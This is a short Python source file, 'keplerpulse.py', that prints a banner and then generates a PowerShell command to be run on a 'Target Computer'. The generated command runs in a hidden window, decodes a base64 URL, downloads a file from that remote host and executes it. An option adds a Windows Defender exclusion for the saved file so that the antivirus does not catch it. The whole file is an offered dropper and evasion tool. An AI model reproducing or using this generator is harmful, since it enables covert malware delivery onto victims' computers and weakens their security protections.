keplerpulse.py

1. #!/usr/bin/python3
2.  
3. from colorama import Fore, Style
4. import colorama
5. import time
6. import os, sys
7. import base64
8.  
9. banner = """
10. ██╗  ██╗███████╗██████╗ ██╗     ███████╗██████╗     ██████╗ ██╗   ██╗██╗     ███████╗███████╗
11. ██║ ██╔╝██╔════╝██╔══██╗██║     ██╔════╝██╔══██╗    ██╔══██╗██║   ██║██║     ██╔════╝██╔════╝
12. █████╔╝ █████╗  ██████╔╝██║     █████╗  ██████╔╝    ██████╔╝██║   ██║██║     ███████╗█████╗  
13. ██╔═██╗ ██╔══╝  ██╔═══╝ ██║     ██╔══╝  ██╔══██╗    ██╔═══╝ ██║   ██║██║     ╚════██║██╔══╝  
14. ██║  ██╗███████╗██║     ███████╗███████╗██║  ██║    ██║     ╚██████╔╝███████╗███████║███████╗
15. ╚═╝  ╚═╝╚══════╝╚═╝     ╚══════╝╚══════╝╚═╝  ╚═╝    ╚═╝      ╚═════╝ ╚══════╝╚══════╝╚══════╝
16.  
17. """
18.  
19.  
20. def __main__():
21.  
22.     colorama.init()
23.     def help():
24.         print("keplerpulse _direct_download_link exclude=true/false path=CUSTOM_PATH")
25.         print("- _direct_download_link - The url to the file that will be downloaded and executed. This link must be direct.")
26.         print("- exclude=true/false - Add Windows Defender Exclusions. Requires UAC.")
27.         print("- path=CUSTOM_PATH - Custom Path to save file into.")
28.         sys.exit()
29.  
30.     powershell_ = r"""$a = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('{link}')); (new-object System.Net.WebClient).DownloadFile($a,'{path}'); Start-Process "{path}"
31.    """
32.  
33.     exclude_payload_ = r"""-inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath '{path}';"""
34.     try:
35.         download_link = ""
36.         exclude = ""
37.         save_path = ""
38.         exc = False
39.         try:
40.             download_link = base64.b64encode(sys.argv[1].encode())
41.             exclude = sys.argv[2].split("=")[1]
42.  
43.             if(exclude == "true"):
44.                 exc = True
45.  
46.         except IndexError:
47.             help()
48.        
49.         try:
50.             path = sys.argv[3]
51.             if(len(path) > 0):
52.                 save_path = path.split("=")[1]
53.         except IndexError:
54.             pass
55.  
56.  
57.         # print("The Download Link : ", base64.b64decode(download_link).decode())
58.         # print("Path : ", save_path)
59.         # print("Exclude : " , exclude)
60.        
61.         print(Style.BRIGHT + Fore.LIGHTRED_EX + banner + Style.RESET_ALL)
62.         print(Fore.LIGHTCYAN_EX + ">> Run the following command on a Target Computer.\n>> Note that the Windows Defender Exclusion Option will only work if executed in a Elevated Shell."+ Style.RESET_ALL)
63.         payload = powershell_.replace("{link}", download_link.decode()).replace("{path}", save_path)
64.         if(exc):
65.             new = exclude_payload_.replace("{path}", save_path)
66.             print("powershell.exe -windowstyle hidden " + new + " " + payload)
67.         else:
68.             print("powershell.exe -windowstyle hidden ", payload )
69.     except Exception as e:
70.         print("Error : ", str(e))
71.    
72.  
73.  
74. if __name__ == "__main__":
75.     __main__()
76.